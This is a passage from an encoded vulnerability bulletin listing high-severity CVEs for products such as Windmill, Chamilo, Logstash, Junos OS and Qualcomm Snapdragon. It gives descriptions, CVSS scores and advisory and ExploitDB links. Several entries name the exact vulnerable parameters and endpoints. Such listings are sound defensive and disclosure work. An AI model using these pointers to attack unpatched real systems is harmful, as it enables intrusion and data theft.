malicious file can lead to a heap buffer overflow. An attacker can provide=
a malicious file to trigger this vulnerability. 2026-04-07 8.1 CVE-2026-20= 884 [ https://www.cve.org/CVERecord?id=3DCVE-2026-20884 ] https://talosinte= lligence.com/vulnerability_reports/TALOS-2026-2364
=C2=A0 Windmill Labs--Windmill CE (Community Edition) Windmill versions 1.5= 6.0 through 1.614.0 contain a missing authorization vulnerability that allo=
ws users with the Operator role to perform prohibited entity creation and m= odification actions via the backend API. Although Operators are documented = and priced as unable to create or modify entities, the API does not enforce=
the Operator restriction on workspace endpoints, allowing an Operator to c= reate and update scripts, flows, apps, and raw_apps. Since Operators can al=
so execute scripts via the jobs API, this allows direct privilege escalatio=
n to remote code execution within the Windmill deployment. This vulnerabili=
ty has existed since the introduction of the Operator role in version 1.56.=
0. 2026-04-07 8.8 CVE-2026-22683 [ https://www.cve.org/CVERecord?id=3DCVE-2= 026-22683 ] https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmi= ll-rce/
https://github.com/Chocapikk/Windfall https://github.com/windmill-labs/windmill/releases/tag/v1.615.0 https://github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e= 3a23a17698588b
https://www.windmill.dev/
https://apps.nextcloud.com/apps/flow/releases
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38, there is a path traversal in main/exercise/savescores.php l= eading to arbitrary file feletion. User input from $_REQUEST['test'] is con= catenated directly into filesystem path without canonicalization or travers=
al checks. This vulnerability is fixed in 1.11.38. 2026-04-10 8.3 CVE-2026-= 31939 [ https://www.cve.org/CVERecord?id=3DCVE-2026-31939 ] https://github.= com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a0= 35800abae78
https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38
=C2=A0 danbilabs--Advanced Members for ACF The Advanced Members for ACF plu= gin for WordPress is vulnerable to arbitrary file deletion due to insuffici= ent file path validation in the create_crop function in all versions up to,=
and including, 1.2.5. This makes it possible for authenticated attackers, = with Subscriber-level access and above, to delete arbitrary files on the se= rver, which can easily lead to remote code execution when the right file is=
deleted (such as wp-config.php). The vulnerability was partially patched i=
n version 1.2.5. 2026-04-08 8.8 CVE-2026-3243 [ https://www.cve.org/CVEReco= rd?id=3DCVE-2026-3243 ] https://www.wordfence.com/threat-intel/vulnerabilit= ies/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=3Dcve https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core= /modules/class-avatar.php#L57 https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core= /modules/class-avatar.php#L266 https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modu= les/class-avatar.php#L710
https://plugins.trac.wordpress.org/changeset/3479725/ https://plugins.trac.wordpress.org/changeset/3492372/
=C2=A0 Elastic--Logstash Improper Limitation of a Pathname to a Restricted = Directory (CWE-22) in Logstash can lead to arbitrary file write and potenti= ally remote code execution via Relative Path Traversal (CAPEC-139). The arc= hive extraction utilities used by Logstash do not properly validate file pa= ths within compressed archives. An attacker who can serve a specially craft=
ed archive to Logstash through a compromised or attacker-controlled update = endpoint can write arbitrary files to the host filesystem with the privileg=
es of the Logstash process. In certain configurations where automatic pipel= ine reloading is enabled, this can be escalated to remote code execution. 2= 026-04-08 8.1 CVE-2026-33466 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 33466 ] https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-= update-esa-2026-29/385816
=C2=A0 homarr-labs--homarr Homarr is an open-source dashboard. Prior to 1.5= 7.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discover=
ed in Homarr's /auth/login page. The application improperly trusts a URL pa= rameter (callbackUrl), which is passed to redirect and router.push. An atta= cker can craft a malicious link that, when opened by an authenticated user,=
performs a client-side redirect and executes arbitrary JavaScript in the c= ontext of their browser. This could lead to credential theft, internal netw= ork pivoting, and unauthorized actions performed on behalf of the victim. T= his vulnerability is fixed in 1.57.0. 2026-04-06 8.8 CVE-2026-33510 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-33510 ] https://github.com/homarr-la= bs/homarr/security/advisories/GHSA-79pg-554g-rw82
=C2=A0 IBM--Langflow Desktop IBM Langflow Desktop 1.6.0 through 1.8.2 Langf= low could allow an authenticated user to execute arbitrary code on the syst= em, caused by an insecure default setting which permits the deserialization=
of untrusted data in the FAISS component. 2026-04-08 8.8 CVE-2026-3357 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-3357 ] https://www.ibm.com/suppo= rt/pages/node/7268428
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray()=
method uses PHP's eval() to parse platform settings from the database. An = attacker with admin access (obtainable via Advisory 1) can inject arbitrary=
PHP code into the settings, which is then executed when any user (includin=
g unauthenticated) requests /platform-config/list. This vulnerability is fi= xed in 2.0.0-RC.3. 2026-04-10 8.8 CVE-2026-33618 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-33618 ] https://github.com/chamilo/chamilo-lms/security= /advisories/GHSA-hp4w-jmwc-pg7w https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5= a219fd09b3b
=C2=A0 lexiforest--curl_cffi curl_cffi is the a Python binding for curl. Pr= ior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, = and follows redirects automatically via the underlying libcurl. Because of = this, an attacker-controlled URL can redirect requests to internal services=
such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonati=
on feature can make these requests appear as legitimate browser traffic, wh= ich may bypass certain network controls. This vulnerability is fixed in 0.1= 5.0. 2026-04-06 8.6 CVE-2026-33752 [ https://www.cve.org/CVERecord?id=3DCVE= -2026-33752 ] https://github.com/lexiforest/curl_cffi/security/advisories/G= HSA-qw2m-4pqf-rmpp
=C2=A0 Juniper Networks--Junos OS A Missing Authorization vulnerability in = the CLI of Juniper Networks Junos OS on MX Series allows a local, authentic= ated user with low privileges to execute specific commands which will lead =
to a complete compromise of managed devices. Any user logged in, without re= quiring specific privileges, can issue 'request csds' CLI operational comma= nds. These commands are only meant to be executed by high privileged or use=
rs designated for Juniper Device Manager (JDM) / Connected Security Distrib= uted Services (CSDS) operations as they will impact all aspects of the devi= ces managed via the respective MX. This issue affects Junos OS on MX Series=
: * 24.4 releases before 24.4R2-S3,=C2=A0 * 25.2 releases before 25.2R2. Th=
is issue does not affect Junos OS releases before 24.4. 2026-04-09 8.8 CVE-= 2026-33785 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33785 ] https://kb= .juniper.net/JSA107872
=C2=A0 podman-desktop--podman-desktop Podman Desktop is a graphical tool fo=
r developing on containers and Kubernetes. Prior to 1.26.2, an unauthentica= ted HTTP server exposed by Podman Desktop allows any network attacker to re= motely trigger denial-of-service conditions and extract sensitive informati= on. By abusing missing connection limits and timeouts, an attacker can exha= ust file descriptors and kernel memory, leading to application crash or ful=
l host freeze. Additionally, verbose error responses disclose internal path=
s and system details (including usernames on Windows), aiding further explo= itation. The issue requires no authentication or user interaction and is ex= ploitable over the network. This vulnerability is fixed in 1.26.2. 2026-04-=
07 8.2 CVE-2026-34045 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34045 ]=
https://github.com/podman-desktop/podman-desktop/security/advisories/GHSA-= 2q88-39rh-gxvv
=C2=A0 OpenClaw--OpenClaw OpenClaw before 2026.3.25 contains an improper ac= cess control vulnerability in the HTTP /sessions/:sessionKey/kill route tha=
t allows any bearer-authenticated user to invoke admin-level session termin= ation functions without proper scope validation. Attackers can exploit this=
by sending authenticated requests to kill arbitrary subagent sessions via = the killSubagentRunAdmin function, bypassing ownership and operator scope r= estrictions. 2026-04-09 8.1 CVE-2026-34512 [ https://www.cve.org/CVERecord?= id=3DCVE-2026-34512 ] GitHub Security Advisory (GHSA-9p93-7j67-5pc2) [ http= s://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2 ] Patch Commit [ https://github.com/openclaw/openclaw/commit/02cf12371f9353a1= 6455da01cc02e6c4ecfc4152 ]
VulnCheck Advisory: OpenClaw < 2026.3.25 - Improper Access Control in /sess= ions/:sessionKey/kill Endpoint [ https://www.vulncheck.com/advisories/openc= law-improper-access-control-in-sessions-sessionkey-kill-endpoint ]
=C2=A0 opnsense--core OPNsense is a FreeBSD based firewall and routing plat= form. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the = login username directly into an LDAP search filter without calling ldap_esc= ape(). An unauthenticated attacker can inject LDAP filter metacharacters in=
to the username field of the WebGUI login page to enumerate valid LDAP user= names in the configured directory. When the LDAP server configuration inclu= des an Extended Query to restrict login to members of a specific group, the=
same injection can be used to bypass that group membership restriction and=
authenticate as any LDAP user whose password is known, regardless of group=
membership. This vulnerability is fixed in 26.1.6. 2026-04-09 8.2 CVE-2026= -34578 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34578 ] https://github= .com/opnsense/core/security/advisories/GHSA-jpm7-f59c-mp54 https://github.com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb718= 13c6e
=C2=A0 Adobe--Acrobat Reader Acrobat Reader versions 24.001.30356, 26.001.2= 1367 and earlier are affected by an Improperly Controlled Modification of O= bject Prototype Attributes ('Prototype Pollution') vulnerability that could=
result in arbitrary code execution in the context of the current user. Exp= loitation of this issue requires user interaction in that a victim must ope=
n a malicious file. 2026-04-11 8.6 CVE-2026-34621 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-34621 ] https://helpx.adobe.com/security/products/acro= bat/apsb26-43.html
=C2=A0 MontFerret--ferret Ferret is a declarative system for working with w=
eb data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's=
IO::FS::WRITE standard library function allows a malicious website to writ=
e arbitrary files to the filesystem of the machine running Ferret. When an = operator scrapes a website that returns filenames containing ../ sequences,=
and uses those filenames to construct output paths (a standard scraping pa= ttern), the attacker controls both the destination path and the file conten=
t. This can lead to remote code execution via cron jobs, SSH authorized_key=
s, shell profiles, or web shells. This vulnerability is fixed in 2.0.0-alph= a.4. 2026-04-06 8.1 CVE-2026-34783 [ https://www.cve.org/CVERecord?id=3DCVE= -2026-34783 ] https://github.com/MontFerret/ferret/security/advisories/GHSA= -j6v5-g24h-vg4j https://github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5= b83322917
=C2=A0 David Lingren--Media LIbrary Assistant Improper Neutralization of Sp= ecial Elements used in an SQL Command ('SQL Injection') vulnerability in Da= vid Lingren Media LIbrary Assistant allows SQL Injection.This issue affects=
Media LIbrary Assistant: from n/a through 3.34. 2026-04-06 8.5 CVE-2026-34= 885 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34885 ] https://patchstac= k.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordp= ress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id= =3Dcve
=C2=A0 adianti--Adianti Framework Adianti Framework 5.5.0 and 5.6.0 contain=
s an SQL injection vulnerability that allows authenticated users to manipul= ate database queries by injecting SQL code through the name field in System= ProfileForm. Attackers can submit crafted SQL statements in the profile edi=
t endpoint to modify user credentials and gain administrative access. 2026-= 04-12 7.1 CVE-2018-25257 [ https://www.cve.org/CVERecord?id=3DCVE-2018-2525=
7 ] ExploitDB-46217 [ https://www.exploit-db.com/exploits/46217 ]
VulnCheck Advisory: Adianti Framework 5.5.0 and 5.6.0 SQL Injection via Pro= file [ https://www.vulncheck.com/advisories/adianti-framework-and-sql-injec= tion-via-profile ]
=C2=A0 Resourcespace--ResourceSpace ResourceSpace 8.6 contains an SQL injec= tion vulnerability that allows authenticated attackers to execute arbitrary=
SQL queries by injecting malicious code through the keywords parameter in = collection_edit.php. Attackers can submit POST requests with crafted SQL pa= yloads in the keywords field to extract sensitive database information incl= uding schema names, user credentials, and other confidential data. 2026-04-=
12 7.1 CVE-2019-25693 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25693 ]=
ExploitDB-46274 [ https://www.exploit-db.com/exploits/46274 ]
Official Product Homepage [ https://www.resourcespace.com/ ]
Product Reference [ https://www.resourcespace.com/get ]
VulnCheck Advisory: ResourceSpace 8.6 SQL Injection via collection_edit.php=
[ https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-col= lection-edit-php ]
=C2=A0 Newsbull--Newsbull Haber Script Newsbull Haber Script 1.0.0 contains=
multiple SQL injection vulnerabilities in the search parameter that allow = authenticated attackers to extract database information through time-based,=
blind, and boolean-based injection techniques. Attackers can inject malici= ous SQL code through the search parameter in endpoints like /admin/comment/= records, /admin/category/records, /admin/news/records, and /admin/menu/chil=
ds to manipulate database queries and retrieve sensitive data. 2026-04-12 7=
.1 CVE-2019-25699 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25699 ] Exp= loitDB-46266 [ https://www.exploit-db.com/exploits/46266 ]
Official Product Homepage [ http://newsbull.org/ ]
Product Reference [ https://github.com/gurkanuzunca/newsbull ]
VulnCheck Advisory: Newsbull Haber Script 1.0.0 Authenticated SQL Injection=
via search parameter [ https://www.vulncheck.com/advisories/newsbull-haber= -script-authenticated-sql-injection-via-search-parameter ]
=C2=A0 Impresscms--ImpressCMS ImpressCMS 1.3.11 contains a time-based blind=
SQL injection vulnerability that allows authenticated attackers to manipul= ate database queries by injecting SQL code through the 'bid' parameter. Att= ackers can send POST requests to the admin.php endpoint with malicious 'bid=
' values containing SQL commands to extract sensitive database information.=
2026-04-12 7.1 CVE-2019-25703 [ https://www.cve.org/CVERecord?id=3DCVE-201= 9-25703 ] ExploitDB-46239 [ https://www.exploit-db.com/exploits/46239 ] Official Product Homepage [ http://www.impresscms.org/ ]
Product Reference [ https://sourceforge.net/projects/impresscms/files/v1.3.= 11/impresscms_1.3.11.zip ]
VulnCheck Advisory: ImpressCMS 1.3.11 SQL Injection via bid Parameter [ htt= ps://www.vulncheck.com/advisories/impresscms-sql-injection-via-bid-paramete=
r ]
=C2=A0 Across--DR-810 Across DR-810 contains an unauthenticated file disclo= sure vulnerability that allows remote attackers to download the rom-0 backu=
p file containing sensitive information by sending a simple GET request. At= tackers can access the rom-0 endpoint without authentication to retrieve an=
d decompress the backup file, exposing router passwords and other sensitive=
configuration data. 2026-04-12 7.5 CVE-2019-25706 [ https://www.cve.org/CV= ERecord?id=3DCVE-2019-25706 ] ExploitDB-46132 [ https://www.exploit-db.com/= exploits/46132 ]
Official Product Homepage [ http://www.ac.i8i.ir/ ]
VulnCheck Advisory: Across DR-810 ROM-0 Unauthenticated File Disclosure [ h= ttps://www.vulncheck.com/advisories/across-dr-810-rom-0-unauthenticated-fil= e-disclosure ]
=C2=A0 Ebrigade--eBrigade ERP eBrigade ERP 4.5 contains an SQL injection vu= lnerability that allows authenticated attackers to execute arbitrary SQL qu= eries by injecting malicious code through the 'id' parameter. Attackers can=
send GET requests to pdf.php with crafted SQL payloads in the 'id' paramet=
er to extract sensitive database information including table names and sche=
ma details. 2026-04-12 7.1 CVE-2019-25707 [ https://www.cve.org/CVERecord?i= d=3DCVE-2019-25707 ] ExploitDB-46117 [ https://www.exploit-db.com/exploits/= 46117 ]
Official Product Homepage [ https://ebrigade.net/ ]
Product Reference [ https://netcologne.dl.sourceforge.net/project/ebrigade/= ebrigade/eBrigade%204.5/ebrigade_4.5.zip ]
VulnCheck Advisory: eBrigade ERP 4.5 SQL Injection via pdf.php [ https://ww= w.vulncheck.com/advisories/ebrigade-erp-sql-injection-via-pdf-php ]
=C2=A0 MyT--Project Management MyT-PM 1.5.1 contains an SQL injection vulne= rability that allows authenticated attackers to execute arbitrary SQL queri=
es by injecting malicious code through the Charge[group_total] parameter. A= ttackers can submit crafted POST requests to the /charge/admin endpoint wit=
h error-based, time-based blind, or stacked query payloads to extract sensi= tive database information or manipulate data. 2026-04-12 7.1 CVE-2019-25713=
[ https://www.cve.org/CVERecord?id=3DCVE-2019-25713 ] ExploitDB-46084 [ ht= tps://www.exploit-db.com/exploits/46084 ]
Official Product Homepage [ https://manageyourteam.net/ ]
Product Reference [ https://sourceforge.net/projects/myt/ ]
VulnCheck Advisory: MyT-PM 1.5.1 SQL Injection via Charge[group_total] Para= meter [ https://www.vulncheck.com/advisories/myt-pm-sql-injection-via-charg= e-group-total-parameter ]
=C2=A0 Twitch--Twitch Studio Twitch Studio version 0.114.8 and prior contai=
n a privilege escalation vulnerability in its privileged helper tool that a= llows local attackers to execute arbitrary code as root by exploiting an un= protected XPC service. Attackers can invoke the installFromPath:toPath:with= Reply: method to overwrite system files and privileged binaries, achieving = full system compromise. Twitch Studio was discontinued in May 2024. 2026-04= -06 7.8 CVE-2024-14032 [ https://www.cve.org/CVERecord?id=3DCVE-2024-14032 =
] https://www.iru.com/blog/twitch-privileged-helper https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-studio https://help.twitch.tv/s/article/recommended-software-for-broadcasting https://www.vulncheck.com/advisories/twitch-studio-launcherhelper-xpc-missi= ng-authorization-to-root-file-write
=C2=A0 WAGO--CC100 (0751-9x01) An authenticated remote attacker with high p= rivileges can exploit the OpenVPN configuration via the web-based managemen=
t interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN m=
ay allow the execution of arbitrary shell commands enabling the attacker to=
run arbitrary commands on the device. 2026-04-09 7.2 CVE-2024-1490 [ https= ://www.cve.org/CVERecord?id=3DCVE-2024-1490 ] https://certvde.com/de/adviso= ries/VDE-2024-008 https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.j= son
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab CE/EE affect= ing all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 bef= ore 18.10.3 that could have allowed an unauthenticated user to cause denial=
of service by sending repeated GraphQL queries. 2026-04-08 7.5 CVE-2025-12= 664 [ https://www.cve.org/CVERecord?id=3DCVE-2025-12664 ] HackerOne Bug Bou= nty Report #3377091 [ https://hackerone.com/reports/3377091 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/579376 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 Red Hat--Red Hat Enterprise Linux 10 A flaw was found in libssh. Thi=
s vulnerability allows local man-in-the-middle attacks, security downgrades=
of SSH (Secure Shell) connections, and manipulation of trusted host inform= ation, posing a significant risk to the confidentiality, integrity, and ava= ilability of SSH communications via an insecure default configuration on Wi= ndows systems where the library automatically loads configuration files fro=
m the C:\etc directory, which can be created and modified by unprivileged l= ocal users. 2026-04-07 7.8 CVE-2025-14821 [ https://www.cve.org/CVERecord?i= d=3DCVE-2025-14821 ] https://access.redhat.com/security/cve/CVE-2025-14821 RHBZ#2423148 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2423148 ] https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-release=
s/
=C2=A0 Qualcomm, Inc.--Snapdragon Memory corruption when buffer copy operat= ion fails due to integer overflow during attestation report generation. 202= 6-04-06 7.8 CVE-2025-47389 [ https://www.cve.org/CVERecord?id=3DCVE-2025-47= 389 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/ap= ril-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory corruption while preprocessing IOC=
TL request in JPEG driver. 2026-04-06 7.8 CVE-2025-47390 [ https://www.cve.= org/CVERecord?id=3DCVE-2025-47390 ] https://docs.qualcomm.com/product/publi= cresources/securitybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory corruption while processing a fram=
e request from user. 2026-04-06 7.8 CVE-2025-47391 [ https://www.cve.org/CV= ERecord?id=3DCVE-2025-47391 ] https://docs.qualcomm.com/product/publicresou= rces/securitybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Cryptographic issue while copying data to=
a destination buffer without validating its size. 2026-04-06 7.1 CVE-2025-= 47400 [ https://www.cve.org/CVERecord?id=3DCVE-2025-47400 ] https://docs.qu= alcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html =C2=A0 Case Themes--Case Theme User Improper Control of Filename for Includ= e/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerabil= ity in Case Themes Case Theme User allows PHP Local File Inclusion.This iss=
ue affects Case Theme User: from n/a before 1.0.4. 2026-04-10 7.5 CVE-2025-= 5804 [ https://www.cve.org/CVERecord?id=3DCVE-2025-5804 ] https://patchstac= k.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-cas= e-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=3Dcve
=C2=A0 Zootemplate--Cerato Improper Neutralization of Input During Web Page=
Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato al= lows Reflected XSS.This issue affects Cerato: from n/a through 2.2.18. 2026= -04-10 7.1 CVE-2025-58920 [ https://www.cve.org/CVERecord?id=3DCVE-2025-589=
20 ] https://patchstack.com/database/wordpress/theme/cerato/vulnerability/w= ordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerabili= ty?_s_id=3Dcve
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab CE/EE affect= ing all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 be= fore 18.10.3 that could have allowed an unauthenticated user to cause denia=
l of service due to improper input validation of JSON payloads. 2026-04-08 = 7.5 CVE-2026-1092 [ https://www.cve.org/CVERecord?id=3DCVE-2026-1092 ] Hack= erOne Bug Bounty Report #3487030 [ https://hackerone.com/reports/3487030 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/586479 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 IBM--Verify Identity Access Container IBM Verify Identity Access Con= tainer 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 th= rough 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM S= ecurity Verify Access 10.0 through 10.0.9.1 allows an attacker to contact i= nternal authentication endpoints which are protected by the Reverse Proxy. = 2026-04-08 7.2 CVE-2026-1343 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 1343 ] https://www.ibm.com/support/pages/node/7268253
=C2=A0 Red Hat--Red Hat Enterprise Linux 10 A flaw was found in gnutls. A r= emote, unauthenticated attacker can exploit this vulnerability by sending a=
specially crafted ClientHello message with an invalid Pre-Shared Key (PSK)=
binder value during the TLS handshake. This can lead to a NULL pointer der= eference, causing the server to crash and resulting in a remote Denial of S= ervice (DoS) condition. 2026-04-09 7.5 CVE-2026-1584 [ https://www.cve.org/= CVERecord?id=3DCVE-2026-1584 ] https://access.redhat.com/security/cve/CVE-2= 026-1584
RHBZ#2435258 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2435258 ]
=C2=A0 Qualcomm, Inc.--Snapdragon Transient DOS when processing nonstandard=
FILS Discovery Frames with out-of-range action sizes during initial scans.=
2026-04-06 7.6 CVE-2026-21367 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-21367 ] https://docs.qualcomm.com/product/publicresources/securitybulleti= n/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when retrieving output = buffer with insufficient size validation. 2026-04-06 7.8 CVE-2026-21371 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-21371 ] https://docs.qualcomm.co= m/product/publicresources/securitybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when sending IOCTL requ= ests with invalid buffer sizes during memcpy operations. 2026-04-06 7.8 CVE= -2026-21372 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21372 ] https://d= ocs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bullet= in.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when accessing an outpu=
t buffer without validating its size during IOCTL processing. 2026-04-06 7.=
8 CVE-2026-21373 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21373 ] http= s://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-b= ulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when processing auxilia=
ry sensor input/output control commands with insufficient buffer size valid= ation. 2026-04-06 7.8 CVE-2026-21374 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-21374 ] https://docs.qualcomm.com/product/publicresources/securityb= ulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when accessing an outpu=
t buffer without validating its size during IOCTL processing. 2026-04-06 7.=
8 CVE-2026-21375 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21375 ] http= s://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-b= ulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when accessing an outpu=
t buffer without validating its size during IOCTL processing in a camera se= nsor driver. 2026-04-06 7.8 CVE-2026-21376 [ https://www.cve.org/CVERecord?= id=3DCVE-2026-21376 ] https://docs.qualcomm.com/product/publicresources/sec= uritybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when accessing an outpu=
t buffer without validating its size during IOCTL processing in a camera se= nsor driver. 2026-04-06 7.8 CVE-2026-21378 [ https://www.cve.org/CVERecord?= id=3DCVE-2026-21378 ] https://docs.qualcomm.com/product/publicresources/sec= uritybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when using deprecated D= MABUF IOCTL calls to manage video memory. 2026-04-06 7.8 CVE-2026-21380 [ h= ttps://www.cve.org/CVERecord?id=3DCVE-2026-21380 ] https://docs.qualcomm.co= m/product/publicresources/securitybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Transient DOS when receiving a service da=
ta frame with excessive length during device matching over a neighborhood a= wareness network protocol connection. 2026-04-06 7.6 CVE-2026-21381 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-21381 ] https://docs.qualcomm.com/pr= oduct/publicresources/securitybulletin/april-2026-bulletin.html
=C2=A0 Qualcomm, Inc.--Snapdragon Memory Corruption when handling power man= agement requests with improperly sized input/output buffers. 2026-04-06 7.8=
CVE-2026-21382 [ https://www.cve.org/CVERecord?id=3DCVE-2026-21382 ] https= ://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bu= lletin.html
=C2=A0 Juniper Networks--Junos OS A UNIX Symbolic Link (Symlink) Following = vulnerability in the CLI of Juniper Networks Junos OS allows a local, authe= nticated attacker with low privileges to escalate their privileges to root = which will lead to a complete compromise of the system. When after a user h=
as performed a specific 'file link ...' CLI operation, another user commits=
(unrelated configuration changes), the first user can login as root. This = issue affects Junos OS: * all versions before 23.2R2-S7, * 23.4 versions be= fore 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24= .4R2-S2, * 25.2 versions before 25.2R2. This issue does not affect versions=
25.4R1 or later. 2026-04-09 7.3 CVE-2026-21916 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-21916 ] https://kb.juniper.net/JSA107807
=C2=A0 Dolibarr--Dolibarr ERP/CRM Dolibarr ERP/CRM versions prior to 23.0.2=
contain an authenticated remote code execution vulnerability in the dol_ev= al_standard() function that fails to apply forbidden string checks in white= list mode and does not detect PHP dynamic callable syntax. Attackers with a= dministrator privileges can inject malicious payloads through computed extr= afields or other evaluation paths using PHP dynamic callable syntax to bypa=
ss validation and achieve arbitrary command execution via eval(). 2026-04-0=
7 7.2 CVE-2026-22666 [ https://www.cve.org/CVERecord?id=3DCVE-2026-22666 ] = https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-2= 2666 https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093= dbaa40dea
https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2 https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via= -dol-eval-standard
=C2=A0 HKUDS--OpenHarness OpenHarness prior to commit 166fcfe=C2=A0contains=
an improper access control vulnerability in built-in file tools due to inc= onsistent parameter handling in permission enforcement, allowing attackers = who can influence agent tool execution to read arbitrary local files outsid=
e the intended repository scope. Attackers can exploit the path parameter n=
ot being passed to the PermissionChecker in read_file, write_file, edit_fil=
e, and notebook_edit tools to bypass deny rules and access sensitive files = such as configuration files, credentials, and SSH material, or create and o= verwrite files in restricted host paths in full_auto mode. 2026-04-07 7.1 C= VE-2026-22682 [ https://www.cve.org/CVERecord?id=3DCVE-2026-22682 ] https:/= /github.com/HKUDS/OpenHarness/pull/32 https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f565427= 25b0298e9 https://www.vulncheck.com/advisories/openharness-improper-access-control-vi= a-file-tools
=C2=A0 VMware--Spring Cloud Gateway When configuring SSL bundles in Spring = Cloud Gateway by using the configuration property=C2=A0spring.ssl.bundle, t=
he configuration was silently ignored and the default SSL configuration was=
used instead. Note: The=C2=A04.2.x=C2=A0branch is no longer under open sou= rce support. If you are using Spring Cloud Gateway=C2=A04.2.0=C2=A0and are = not an enterprise customer, you can upgrade to any Spring Cloud Gateway=C2= =A04.2.x=C2=A0release newer than=C2=A04.2.0=C2=A0 available on Maven Center=
al https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-ga= teway/ . Ideally if you are not an enterprise customer, you should be upgra= ding to=C2=A05.0.2=C2=A0or=C2=A05.1.1=C2=A0which are the current supported = open source releases. 2026-04-10 7.5 CVE-2026-22750 [ https://www.cve.org/C= VERecord?id=3DCVE-2026-22750 ] https://spring.io/security/cve-2026-22750
